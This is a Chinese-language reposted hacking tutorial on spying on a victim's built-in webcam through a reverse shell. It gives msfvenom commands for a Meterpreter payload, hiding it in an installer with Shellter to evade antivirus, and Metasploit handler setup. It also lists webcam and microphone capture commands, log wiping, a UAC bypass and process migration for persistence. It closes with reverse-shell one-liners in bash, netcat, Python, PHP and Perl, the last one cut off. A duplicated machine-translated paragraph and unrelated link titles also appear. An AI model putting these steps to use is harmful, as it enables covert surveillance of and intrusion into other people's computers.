python控制摄像头拍照是反的_使用反向Shell控制摄像头
原标题:使用反向Shell控制摄像头
如果你已经用胶条封住了你的网络摄像头,你可能是因为听说过黑客或NSA可以远程监视你。那么问题来了,这些你素未谋面人又是如何远程连接到你的机器并监视你的呢?
这可能是因为你将你的CCTV,IP摄像头公开暴露在了互联网上,而攻击者又在Shodan等网站上发现了它们。加之你又没有更改它们的默认密码和bam,导致攻击者顺利控制了你的摄像头,并对你的一举一动进行监视。
以上是物联网摄像头最常见的安全问题。但如果是内置的网络摄像头,那么更可能的解释是攻击者通过Meterpreter payload入侵并控制了它。使用Meterpreter攻击者可以获取到一个反向shell,这也是本文将要讨论的内容。有关Meterpreter的更多信息,请参阅:https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
这里,你可能有个疑问。为什么攻击者不直接访问你的机器,而是通过一个反向shell呢?其实原因很简单,因为直接访问的方式很可能会被阻止。相比起出站流量,入站流量更容易受到限制。另一方面,如果我们主动进行连接,那么目标机器更有可能放行该流量。这是因为目标机器想要与我们的机器建立连接。
msfvenom是一个框架,我们将用它来获取一个反向shell。它已被预装在了Parrot和Kali上。首先,让我们运行以下命令来创建Meterpreter reverse TCP shell payload。
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.X.X LPORT=4444 -o /home/parrot/name.exe
创建完成后,现在让我们来上传它……….blocked。这是因为MeterPreter payload名声在外,早已被各个安全软件所标记,因此大多数的安全软件都能够发现阻止/隔离它。
我们可以尝试使用一个名为Shellter的工具,来更改其哈希并将反向shell嵌入到另一个文件当中。之所以选择将shell嵌入到一个安装文件中,是因为大多数安装文件需要以管理员身份运行。正如你在之后将看到的那样,以管理员身份运行漏洞利用程序,可以为我们省去很多的麻烦。
你可以通过shelter来直接启动它。同样,它已被预装在了Parrot和Kali上。
让我们使用Auto [A]并定位我为本例创建的可执行文件。
接下来,我们选择反向TCP shell并输入我们机器的IP和端口(攻击者)。完成后,它会将shell嵌入到你选择的exe文件中,以便你将其上传到目标机器。现在你需要通过一种方法将它放到目标机器上,但对于本例我将复制并粘贴。
虽然,我们隐藏了Meterpreter shell,但AV还是成功地检测到了它。为了便于我们的演示,我们现在暂时先将AV关闭。当然,在现实场景中攻击者不可能像我这么随意,更多的是通过技术手段击溃AV,或是创建一个目标无法检测的payload。
然而,尽管屏蔽了Meterpreter外壳,AV仍设法检测到它。 我现在就打算把它关掉,因为我可以。 在现实世界中,攻击者会将AV瘫痪或使其盲目,以便他们可以降低有效载荷。
现在,让我们运行它。
在开始之前,让我们在攻击机机上加载msfconsole(Metasploit)并运行以下命令:
msfconsole use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.X.X set LPORT 4444 run
你的会话将侦听反向shell脚本中指定的端口和IP。现在,我们以用户身份运行exploit:
正如你在右侧所看到的,我们有几次会话建立失败的情况。这就是我之前提到的为什么需要用户以管理员身份运行的原因。那样就可以顺利运行和注入所有的脚本和DLL。如果用户以管理员身份运行,你将不会看到任何失败的情况。如下所示:
成功获取反向shell后,现在我们就可以针对目标机器执行我们想要的操作了。如果你的目标是摄像头,那么你可以执行以下操作:
Show Webcams: webcam_list Webcam Snap Help: webcam_snap -h Take a Picture and don’t load the image after: webcam_snap -i 1 -v false Record audio: record_mic Record Webcam: run webcam -p /var/www/ Stop recording: run webcam -s
不仅仅是网络摄像头(Webcams)。你还可以执行更多其他的命令。例如:清除所有日志(应用程序,系统和安全日志):clearev
这只是一个例子,黑客也不太可能会运行它。因为这么做反而会打草惊蛇提醒了管理员。如果一台机器你发现所有日志都被清除了,那么你可以初步断定有人已经使用过它了。相反,攻击者更有可能的是删除选择的事件来掩盖他们的痕迹。
所有这些都需要管理员权限,而你的用户可能无法使用提升的权限来运行它。那么,你可以使用像bypassuac_comhijacker这样的命令。首先,你仍需要得到一个普通用户级别的反向shell。
获得shell后,输入background并按Enter键。这会将当前会话移至后台。然后你就可以针对当前会话使用bypassuac_comhijack漏洞利用程序了,如下:
然后,你可以回到原始会话并运行以下命令:
成功运行后,你将获取到一个admin shell。为了与目标机器建立长期稳定的后门连接,我们需要将我们的反向shell隐藏在一个更为隐蔽和稳定的进程中(而不是Putty exe或installer文件中)因为这些应用一旦被关闭,我们的连接就将丢失。这就是为什么我们需要尽快迁移我们的反向shell,到那些可以持续运行进程中的原因。
首先,让我们查看正在运行的进程有哪些。
找到相对稳定的进程后,运行migrate [PID]
然后,它会将你的Meterpreter会话迁移到另一个进程中。这样即使他们关闭了被利用的应用程序,你的会话也将被保留。
正如你所看到的,Meterpreter非常的强大。但这并不是你获得反向shell的唯一方法。你还可以使用Netcat。相比起Meterpreter,某些AV供应商并不将其视为威胁。你可以点击此处,查看virustotal中的检测结果。
你可以在Parrot或Kali上的usr/share/windows-binaries/nc.exe下找到Netcat。将nc.exe上传到目标机器后,我们可以运行nc.exe [Attacker IP] [Port] -e cmd.exe。
在攻击者机器上我们需要侦听连接,这可以通过运行nc -lvp [Chosen port]命令来完成。
你将获取到一个普通用户权限的简单反向shell,这对你来说是一个好的开始。然后,你可以通过它来进一步的利用系统获得管理员权限。以下是一些运行反向shell的示例:
PHP
php -r ‘$sock=fsockopen(“192.168.0.10”,1234);exec(“/bin/sh -i &3 2>&3”);’
Bash
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
Netcat Linux
nc 192.168.0.10 1234 -e /bin/sh
Python
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.0.10”,1234));os.dup2(s.fileno,0); os.dup2(s.fileno,1); os.dup2(s.fileno,2);p=subprocess.call([“/bin/sh”,”-i”]);’
Perl
perl -e ‘use Socket;$i=“192.168.0.10”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,
*参考来源:ctrlaltdel,FB小编secist编译,转载请注明来自FreeBuf.COM返回搜狐,查看更多
责任编辑:
python控制摄像头拍照是反的_使用反向Shell控制摄像头相关推荐
- vue实现PC端调用摄像头拍照人脸录入、移动端调用手机前置摄像头人脸录入、及图片旋转矫正、压缩上传base64格式/文件格式
PC端调用摄像头拍照上传base64格式到后台,这个没什么花里胡哨的骚操作,直接看代码 (canvas + video) <template><div><!--开启摄像头 ...
- python 摄像头拍照是反的,Python/OpenCV网络摄像头向后移动
我不知道是什么问题,但当我在网络摄像头上移动时,它捕捉到了我的脸,但它不是我动作的镜子,而是向后/反向的.在 有人知道怎么解决这个问题吗?在 def网络摄像头(网络摄像头.分类器.低比例):if we ...
- python运行不了、显示警告_如何消除Shell运行时显示的警告MatplotlibDeprecationWarning?...
为了方便大家观察只截取了关键部分的代码块. 程序运行时没有错误,只是每次脚本运行到这个函数的时候 from bisect import bisect_right import networkx as ...
- 用python写一个程序控制其它软件_程序员:利用Python实现可控制肉鸡的反向Shell...
一.初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为 Client 主动连接到我们的 Server 端,以实现对多个远程主机的 ...
- java 调用手机相册_微信公众号调用手机摄像头拍照和本地相册
[实例简介] 微信公众号调用手机摄像头拍照和本地相册,上传服务器 [实例截图] [核心代码] 微信公众号调用手机摄像头拍照和本地相册(2) └── 微信公众号调用手机摄像头拍照和本地相册 └── 微信 ...
- python实现摄像头拍照_使用Python控制摄像头拍照并发邮件
o1 前言 为什么会有写这个程序的想法呢? 最初的想法是写一个可以用电脑前置摄像头拍照的程序,在舍友使用你电脑的时候,不经意间获取到一大堆奇葩舍友的表情包. 然后我又突发奇想,要不搞个开机启动吧,这样 ...
- python摄像头拍照比对_如何使用Python控制摄像头拍照并发邮件?
这个实现起来非常容易,主要分为2步,首先控制摄像头拍照,然后将拍到的照片作为邮件附件发送就行,下面我简单介绍一下实现过程,实验环境win7+python3.6+pycharm5.0,主要内容如下: 控 ...
- python控制网络摄像头_用Python控制摄像头拍照并发邮件
码农那点事儿 关注我们,一起学习进步 00 概述 前言 工具 思路 安装及导入包 设置参数 实现拍照 构造邮件内容 发送邮件 判断网络连接 开机自启 后记 o1 前言 为什么会有写这个程序的想法呢? ...
- python控制摄像头拍照_用Python控制摄像头拍照并发邮件
1 前言 为什么会有写这个程序的想法呢? 最初的想法是写一个可以用电脑前置摄像头拍照的程序,在舍友使用你电脑的时候,不经意间获取到一大堆奇葩舍友的表情包. 然后我又突发奇想,要不搞个开机启动吧,这样我 ...
最新文章
- iOS - MySQL 的安装配置
- 今天诞生了智能车竞赛华南赛区三项最好成绩
- BZOJ3709: [PA2014]Bohater
- 利用 CMake 和 NDK 交叉编译 Android 下的可执行程序
- Python爬虫介绍及实战入门
- emqx—mqtt消息服务器
- 给网游写一个挂吧(三) – 启动外挂下
- iOS 开发周报:Apple 发布 iPhone 7 / 7 Plus 、Apple Watch 2 等新品
- 单片机c语言参考文献最新,[2018年最新整理]10个单片机C语言实例.doc
- [html] 你写一个页面需要多长时间?
- sqlserver 指定的网络名不再可用_50个比较实用的SQL Server查询语句(1)
- 微信小程序 Image 图片实现宽度100%,高度自适应
- python网络爬虫--BeautifulSoup
- linux shell 多线程执行程序
- javascript div 没id_javascript原生自定义轮播图组件
- For ourselves
- 线程安全单例模式(C++)
- [转]应该被记住的天才,写在图灵诞辰100周年
- Seven languages in seven weeks (notes on Scala)
- 润物无声因挚爱,育人无痕待花开